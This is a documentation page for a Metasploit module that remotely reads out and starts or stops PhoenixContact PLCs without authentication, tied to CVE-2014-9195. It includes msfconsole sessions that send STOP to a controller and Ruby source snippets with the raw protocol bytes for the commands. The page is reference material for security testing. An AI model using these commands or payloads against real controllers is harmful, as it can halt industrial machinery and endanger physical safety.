PhoenixContact PLC Remote START/STOP Command - Metasploit
This page contains detailed information about how to use the auxiliary/admin/scada/phoenix_command metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: PhoenixContact PLC Remote START/STOP Command
Module: auxiliary/admin/scada/phoenix_command
Source code: modules/auxiliary/admin/scada/phoenix_command.rb
Disclosure date: 2015-05-20
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-9195
PhoenixContact Programmable Logic Controllers are built upon a variant of ProConOS. Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547. It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962. And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series) or on port TCP/20547 (confirmed ILC 39x series)
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/scada/phoenix_command
msf auxiliary(phoenix_command) > show targets
... a list of targets ...
msf auxiliary(phoenix_command) > set TARGET target-id
msf auxiliary(phoenix_command) > show options
... show and set options ...
msf auxiliary(phoenix_command) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
PhoenixContact Programmable Logic Controllers are built are using a variant of ProConOS. The communicate using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547. This protocol allows a user to remotely determine the PLC type, firmware and build number on port TCP/1962. A user can also determine the CPU State (Running or Stopped) and start or stop the CPU.
This functionality is confirmed for the PLC series ILC 15x and 17x on TCP port 20547, and for the ILC 39x series on TCP port 41100. Other series may or may not work, but there is a good chance that they will
Vulnerable Application
This is a hardware zero-day vulnerability that CANNOT be patched. Possible mitigations include: pulling the plug (literally), using network isolation (Firewall, Router, IDS, IPS, network segmentation, etc...) or not allowing bad people on your network.
Most, if not all, PLC's (computers that control engines, robots, conveyor belts, sensors, camera's, doorlocks, CRACs ...) have vulnerabilities where, using their own tools, remote configuration and programming can be done WITHOUT authentication. Investigators and underground hackers are just now creating simple tools to convert the, often proprietary, protocols into simple scripts. The operating word here is proprietary. Right now, the only thing stopping very bad stuff from happening. PhoenixContact uses an (unnamed?) low-level protocol for connection, information exchange and configuration of its PLC devices. This script utilizes that protocol for finding information and switching the PLC mode from STOP to RUN and vice-versa.
Verification Steps
The following demonstrates a basic scenario, we "found" two devices with an open port TCP/1962:
msf > search phoenix
msf > use auxiliary/admin/scada/phoenix_command
msf auxiliary(phoenix_command) > set RHOST 10.66.56.12
RHOST => 10.66.56.12
msf auxiliary(phoenix_command) > run
[*] 10.66.56.12:0 - PLC Type = ILC 150 GSM/GPRS
[*] 10.66.56.12:0 - Firmware = 3.71
[*] 10.66.56.12:0 - Build = 07/13/11 12:00:00
[*] 10.66.56.12:0 - ------------------------------------
[*] 10.66.56.12:0 - --> Detected 15x/17x series, getting current CPU state:
[*] 10.66.56.12:0 - CPU Mode = RUN
[*] 10.66.56.12:0 - ------------------------------------
[*] 10.66.56.12:0 - --> No action specified (NOOP), stopping here
[*] Auxiliary module execution completed
msf auxiliary(phoenix_command) > set RHOST 10.66.56.72
RHOST => 10.66.56.72
msf auxiliary(phoenix_command) > set ACTION REV
ACTION => REV
msf auxiliary(phoenix_command) > run
[*] 10.66.56.72:0 - PLC Type = ILC 390 PN 2TX-IB
[*] 10.66.56.72:0 - Firmware = 3.95
[*] 10.66.56.72:0 - Build = 02/14/11 14:04:47
[*] 10.66.56.72:0 - ------------------------------------
[*] 10.66.56.72:0 - --> Detected 39x series, getting current CPU state:
[*] 10.66.56.72:0 - CPU Mode = RUN
[*] 10.66.56.72:0 - ------------------------------------
[*] 10.66.56.72:0 - --> Sending STOP now
[*] 10.66.56.72:0 - CPU Mode = STOP
[*] Auxiliary module execution completed
Options
msf auxiliary(phoenix_command) > show options
Module options (auxiliary/admin/scada/phoenix_command):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION NOOP yes PLC CPU action, REV means reverse state (Accepted: STOP, START, REV, NOOP)
RHOST yes The target address
RINFOPORT 1962 yes Set info port
RPORT no Set action port, will try autodetect when not set
By default, the module only reads out the PLC Type, Firmware version, Build date and current CPU mode (RUNing or STOPed)
The first three pieces of data (Type, Firmware & Build) are always found on port TCP/1962 (there is no way of changing that port on the PLC, so also no reason to change the 'RINFOPORT' option)
The CPU mode uses a TCP port depending on the PLC Type, the module will
automatically detect the type and port to use, but can be overridden with the
'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the unset RPORT command.
The ACTION option
Action has four possible values:
By default, the module will do nothing to the PLC, therefore No Operation or 'NOOP':
msf auxiliary(phoenix_command) > set ACTION NOOP
The PLC can be forced to go into STOP mode, meaning it stops all execution and all outputs are set to low:
msf auxiliary(phoenix_command) > set ACTION STOP
The PLC can be forced to go into RUN mode, where it keeps running it was or it will start executing its current boot programming:
msf auxiliary(phoenix_command) > set ACTION START
The module can also just read out the CPU mode and then reverse whatever it finds, RUN becomes STOP, STOP becomes RUN:
msf auxiliary(phoenix_command) > set ACTION REV
Go back to menu.
Msfconsole Usage
Here is how the admin/scada/phoenix_command auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/scada/phoenix_command
msf6 auxiliary(admin/scada/phoenix_command) > show info
Name: PhoenixContact PLC Remote START/STOP Command
Module: auxiliary/admin/scada/phoenix_command
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2015-05-20
Provided by:
Tijl Deneut <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION NOOP yes PLC CPU action, REV means reverse current CPU state (Accepted: STOP, START, REV, NOOP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RINFOPORT 1962 yes Set info port
RPORT no Set action port, will try autodetect when not set (TCP)
Description:
PhoenixContact Programmable Logic Controllers are built upon a
variant of ProConOS. Communicating using a proprietary protocol over
ports TCP/1962 and TCP/41100 or TCP/20547. It allows a remote user
to read out the PLC Type, Firmware and Build number on port
TCP/1962. And also to read out the CPU State (Running or Stopped)
AND start or stop the CPU on port TCP/41100 (confirmed ILC 15x and
17x series) or on port TCP/20547 (confirmed ILC 39x series)
References:
https://github.com/tijldeneut/ICSSecurityScripts
https://nvd.nist.gov/vuln/detail/CVE-2014-9195
Module Options
This is a complete list of options available in the admin/scada/phoenix_command auxiliary module:
msf6 auxiliary(admin/scada/phoenix_command) > show options
Module options (auxiliary/admin/scada/phoenix_command):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION NOOP yes PLC CPU action, REV means reverse current CPU state (Accepted: STOP, START, REV, NOOP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RINFOPORT 1962 yes Set info port
RPORT no Set action port, will try autodetect when not set (TCP)
Advanced Options
Here is a complete list of advanced options supported by the admin/scada/phoenix_command auxiliary module:
msf6 auxiliary(admin/scada/phoenix_command) > show advanced
Module advanced options (auxiliary/admin/scada/phoenix_command):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/scada/phoenix_command module can do:
msf6 auxiliary(admin/scada/phoenix_command) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/scada/phoenix_command auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/scada/phoenix_command) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not obtain information on this device
Here is a relevant code snippet related to the "Could not obtain information on this device" error message:
67:
68: def get_info(rhost, rport)
69: connect(true, 'RHOST' => rhost, 'RPORT' => rport)
70: data = send_recv_once("\x01\x01\x00\x1a\x00^\x00\x00\x00\x00\x00\x03\x00\x0cIBETH01N0_M\x00")
71: if data.nil? || data.length < 36
72: print_error("Could not obtain information on this device")
73: disconnect
74: return "UNKNOWN"
75: end
76: code = data[34..35]
77: send_recv_once("\x01\x05\x00\x16\x00\x5f\x00\x00\x08\xef\x00" + hex_to_bin(code) + "\x00\x00\x00\x22\x00\x04\x02\x95\x00\x00")
Could not obtain information on this device
Here is a relevant code snippet related to the "Could not obtain information on this device" error message:
76: code = data[34..35]
77: send_recv_once("\x01\x05\x00\x16\x00\x5f\x00\x00\x08\xef\x00" + hex_to_bin(code) + "\x00\x00\x00\x22\x00\x04\x02\x95\x00\x00")
78: data = send_recv_once("\x01\x06\x00\x0e\x00\x61\x00\x00\x88\x11\x00" + hex_to_bin(code) + "\x04\x00")
79: disconnect
80: if data.nil? || data.length < 200
81: print_error("Could not obtain information on this device")
82: return "UNKNOWN"
83: end
84: plctype = hex_to_bin(data[60..99])
85: print_status("PLC Type = " + plctype)
86: print_status("Firmware = " + hex_to_bin(data[132..139]))
CPU State not detected, full result is
Here is a relevant code snippet related to the "CPU State not detected, full result is" error message:
129: elsif data[48..49] == '07'
130: state = 'STOP'
131: elsif data[49..49] == '00'
132: state = 'ON'
133: else
134: print_error('CPU State not detected, full result is ' + data)
135: return
136: end
137: state
138: end
139:
CPU State not detected, full result is
Here is a relevant code snippet related to the "CPU State not detected, full result is" error message:
141: if data[16..17] == '04'
142: state = 'STOP'
143: elsif data[16..17] == '02'
144: state = 'RUN'
145: else
146: print_error('CPU State not detected, full result is ' + data)
147: return
148: end
149: state
150: end
151:
Unknown device type
Here is a relevant code snippet related to the "Unknown device type" error message:
189: else
190: print_status('--> Sending STOP now')
191: send_recv_once("\xcc\x01\x00\x01\x40\x0e\x00\x00\x4c\x07")
192: end
193: else
194: print_error('Unknown device type')
195: return
196: end
197: sleep(1) ## It takes a second for a PLC to start
198: get_cpu(rhost, rport, devicetype)
199: disconnect
Only ILC and (some) RFC devices are supported.
Here is a relevant code snippet related to the "Only ILC and (some) RFC devices are supported." error message:
213: elsif device.start_with?('ILC 39')
214: devicetype = '39x'
215: print_status('--> Detected 39x series, getting current CPU state:')
216: ractionport.nil? ? (rport = 20547) : (rport = ractionport)
217: else
218: print_error('Only ILC and (some) RFC devices are supported.')
219: return
220: end
221:
222: state = get_cpu(rhost, rport, devicetype)
223: print_status('------------------------------------')
> No action specified (<ACTION>), stopping here
Here is a relevant code snippet related to the "> No action specified (<ACTION>), stopping here" error message:
221:
222: state = get_cpu(rhost, rport, devicetype)
223: print_status('------------------------------------')
224:
225: if action == "NOOP"
226: print_status("--> No action specified (#{action}), stopping here")
227: return
228: end
229:
230: set_cpu(rhost, rport, action, state, devicetype)
231: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13608 Merged Pull Request: Standardise Error Logging
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7537 Merged Pull Request: Fix action port bug in phoenix_command
- #6885 Merged Pull Request: Added phoenix_command.rb
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli
- auxiliary/admin/scada/ge_proficy_substitute_traversal
- auxiliary/admin/scada/modicon_command
- auxiliary/admin/scada/modicon_password_recovery
- auxiliary/admin/scada/modicon_stux_transfer
- auxiliary/admin/scada/moxa_credentials_recovery
- auxiliary/admin/scada/multi_cip_command
- auxiliary/admin/scada/pcom_command
- auxiliary/admin/scada/yokogawa_bkbcopyd_client
- exploit/multi/http/phoenix_exec
- auxiliary/admin/smb/ms17_010_command
- auxiliary/admin/smb/webexec_command
- auxiliary/scanner/http/jenkins_command
- auxiliary/dos/scada/allen_bradley_pccc
- auxiliary/dos/scada/beckhoff_twincat
- auxiliary/dos/scada/d20_tftp_overflow
- auxiliary/dos/scada/igss9_dataserver
- auxiliary/dos/scada/siemens_siprotec4
- auxiliary/dos/scada/yokogawa_logsvr
- auxiliary/scanner/scada/bacnet_l3
- auxiliary/scanner/scada/digi_addp_reboot
- auxiliary/scanner/scada/digi_addp_version
- auxiliary/scanner/scada/digi_realport_serialport_scan
- auxiliary/scanner/scada/digi_realport_version
- auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess
- auxiliary/scanner/scada/koyo_login
- auxiliary/scanner/scada/modbus_banner_grabbing
- auxiliary/scanner/scada/modbusclient
- auxiliary/scanner/scada/modbusdetect
- auxiliary/scanner/scada/modbus_findunitid
- auxiliary/scanner/scada/moxa_discover
- auxiliary/scanner/scada/pcomclient
- auxiliary/scanner/scada/profinet_siemens
- auxiliary/scanner/scada/sielco_winlog_fileaccess
Authors
Tijl Deneut <tijl.deneut[at]howest.be>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
